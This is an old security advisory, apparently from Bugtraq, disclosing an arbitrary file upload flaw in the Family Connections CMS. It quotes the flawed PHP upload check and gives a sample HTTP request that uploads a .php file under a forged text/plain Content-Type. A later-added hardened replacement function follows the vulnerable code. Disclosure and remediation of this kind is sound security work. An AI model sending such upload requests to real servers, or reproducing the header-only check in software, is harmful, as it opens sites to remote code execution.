Family Connections 1.8.2 Arbitrary File Upload
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Family Connections 1.8.2 Arbitrary File Upload
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Fri, 3 Apr 2009 18:07:51 +0200
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 3 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Arbitrary File Upload
[-] Files affected: documents.php inc/documents_class.php
This bug allows a registered user to upload arbitrary
files to the system. This is possible because there
is no check on the file extension, only on the
Content-Type header, which the client can set freely.
...
if (isset($_POST['submitadd'])) {
    $doc  = $_FILES['doc']['name'];
    $desc = addslashes($_POST['desc']);
    // The client-supplied MIME type is passed in as the only "type" check;
    // the original filename (with its extension) is passed through untouched.
    if ($docs->uploadDocument($_FILES['doc']['type'],
                              $_FILES['doc']['name'],
                              $_FILES['doc']['tmp_name'])) {
...

function uploadDocument ($filetype, $filename, $filetmpname) {
    global $LANG;
    $known_photo_types = array(
        'application/msword'            => 'doc',
        'text/plain'                    => 'txt',
        'application/excel'             => 'xsl',
        'application/vnd.ms-excel'      => 'xsl',
        'application/x-msexcel'         => 'xsl',
        'application/x-compressed'      => 'zip',
        'application/x-zip-compressed'  => 'zip',
        'application/zip'               => 'zip',
        'multipart/x-zip'               => 'zip',
        'application/rtf'               => 'rtf',
        'application/x-rtf'             => 'rtf',
        'text/richtext'                 => 'rtf',
        'application/mspowerpoint'      => 'ppt',
        'application/powerpoint'        => 'ppt',
        'application/vnd.ms-powerpoint' => 'ppt',
        'application/x-mspowerpoint'    => 'ppt',
        'application/x-excel'           => 'xsl',
        'application/pdf'               => 'pdf');
    // Only $filetype (the Content-Type header sent by the browser) is
    // validated; the mapped extension on the right is never used.
    if (!array_key_exists($filetype, $known_photo_types)) {
        echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype "
            .$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
        return false;
    } else {
        // The file is stored under the client-chosen name and extension,
        // inside the web root.
        copy($filetmpname, "gallery/documents/$filename");
        return true;
    }
}
...
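A hardened replacement for uploadDocument(), added here as an example; it is not Family Connections code and not part of the original advisory. It assumes PHP 7+ (for random_bytes), the same gallery/documents/ directory and the same call site in documents.php, and decides on the server-derived extension rather than the client's Content-Type, storing the file under a server-generated name.

```php
<?php
// Added example, not Family Connections code: hardened document upload.
// $file is one entry of $_FILES (e.g. $_FILES['doc']); returns the stored
// filename on success or false on rejection. Assumes PHP 7+.
function uploadDocumentSafe(array $file, string $targetDir = 'gallery/documents')
{
    // Allow-list of extensions the application intends to serve as documents.
    $allowedExt = ['doc', 'txt', 'xls', 'zip', 'rtf', 'ppt', 'pdf'];

    // Accept only files that PHP itself received through an upload.
    if (empty($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return false;
    }

    // Derive the extension from the filename, never from $file['type']:
    // the Content-Type header is set by the client and trivially forged.
    $original = basename((string) $file['name']);  // strip any path components
    $ext = strtolower(pathinfo($original, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return false;
    }

    // Second opinion from the bytes on disk rather than from any header:
    // libmagic reports PHP source as text/x-php, so refuse it outright.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) === 'text/x-php') {
        return false;
    }

    // Store under a random server-generated name with the single validated
    // extension, so the client controls neither the path nor the handler
    // the web server will pick for the file.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($targetDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return false;
    }
    chmod($dest, 0644);  // readable, never executable
    return $stored;
}
```

The extension allow-list is only as strong as the web server configuration behind it: script execution should additionally be disabled for gallery/documents/ (or the directory moved outside the document root) so that a validation bypass cannot turn into code execution.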
*************************************************
[+] Code
- [A] Arbitrary File Upload
The following is an example of a malicious HTTP request:
POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="doc"; filename="file.php"\r\n
Content-Type: text/plain\r\n
\r\n
<?php echo "This is not a text file"?>\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="desc"\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="submitadd"\r\n
\r\n
Submit\r\n
--AaB03x--\r\n
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351